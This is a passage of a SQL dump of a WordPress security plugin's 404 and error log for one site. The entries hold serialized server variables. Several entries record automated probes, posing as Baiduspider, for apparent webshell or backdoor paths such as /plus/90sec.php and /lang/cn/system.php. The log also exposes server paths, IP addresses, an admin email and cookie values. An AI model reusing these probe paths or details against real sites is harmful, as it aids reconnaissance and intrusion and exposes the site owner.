gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570446181.5838530063629150390625\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570446181.5838530063629150390625\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570446181.5838530063629150390625\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"57338\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570446181.5838530063629150390625\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZsbZWm4ola1qjywyRVYUAAAAFE\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZsbZWm4ola1qjywyRVYUAAAAFE\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"57338\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsbZWm4ola1qjywyRVYUAAAAFE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570447092.8305\";s:12:\"REQUEST_TIME\";s:10:\"1570447092\";}}','notice','2019-10-07 11:18:32','2019-10-07 11:18:16',35066840,35321520,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570446181.5838530063629150390625',1,0,'103.6.198.69'),(27638,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZsdd6NnKQNBk6r3IXk3RwAAAQQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"42945\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZsdd6NnKQNBk6r3IXk3RwAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570446715.1788\";s:12:\"REQUEST_TIME\";s:10:\"1570446715\";}}','notice','2019-10-07 11:11:58','2019-10-07 11:11:55',35787024,37592864,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(27709,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/plus/ad_js.php?aid=8888\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"103.110.34.80\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6aa11a3f37a74ffde6def38bb103b400\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"103.110.34.80\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycm7DTiPzaBc@31OEzvwAAAQc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycm7DTiPzaBc@31OEzvwAAAQc\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycm7DTiPzaBc@31OEzvwAAAQc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"61818\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/ad_js.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/ad_js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycm7DTiPzaBc@31OEzvwAAAQc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544795.8867\";s:12:\"REQUEST_TIME\";s:10:\"1570544795\";}}','notice','2019-10-08 14:26:37','2019-10-08 14:26:36',35054288,36856040,'https://bintara.com.my/plus/ad_js.php?aid=8888',1,0,'103.110.34.80'),(27708,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/90sec.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"47.150.20.26\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a127f1320a4b7070edf7afcbe6f30496\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"47.150.20.26\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycklQ75tQHORtJE8pnOQAAAEQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycklQ75tQHORtJE8pnOQAAAEQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycklQ75tQHORtJE8pnOQAAAEQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"60307\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90sec.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/90sec.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycklQ75tQHORtJE8pnOQAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544786.6463\";s:12:\"REQUEST_TIME\";s:10:\"1570544786\";}}','notice','2019-10-08 14:26:28','2019-10-08 14:26:27',35053768,36858456,'https://bintara.com.my/plus/90sec.php',1,0,'47.150.20.26'),(27707,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/90000.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"160.126.96.25\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=9bad7202fe0a564805edafff6c92c3b5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"160.126.96.25\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycjFQ75tQHORtJE8pnNwAAAE0\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycjFQ75tQHORtJE8pnNwAAAE0\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/90000.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycjFQ75tQHORtJE8pnNwAAAE0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"60307\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/90000.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/90000.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycjFQ75tQHORtJE8pnNwAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544780.4356\";s:12:\"REQUEST_TIME\";s:10:\"1570544780\";}}','notice','2019-10-08 14:26:22','2019-10-08 14:26:20',35046272,36851504,'https://bintara.com.my/plus/90000.php',1,0,'160.126.96.25'),(27706,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/lang/cn/system.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"93.55.151.59\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=01522734bf654f0f47005521788c75b5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"93.55.151.59\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycWrDTiPzaBc@31OEzngAAAQc\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycWrDTiPzaBc@31OEzngAAAQc\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycWrDTiPzaBc@31OEzngAAAQc\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycWrDTiPzaBc@31OEzngAAAQc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"50992\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/lang/cn/system.php\";s:10:\"SCRIPT_URL\";s:19:\"/lang/cn/system.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycWrDTiPzaBc@3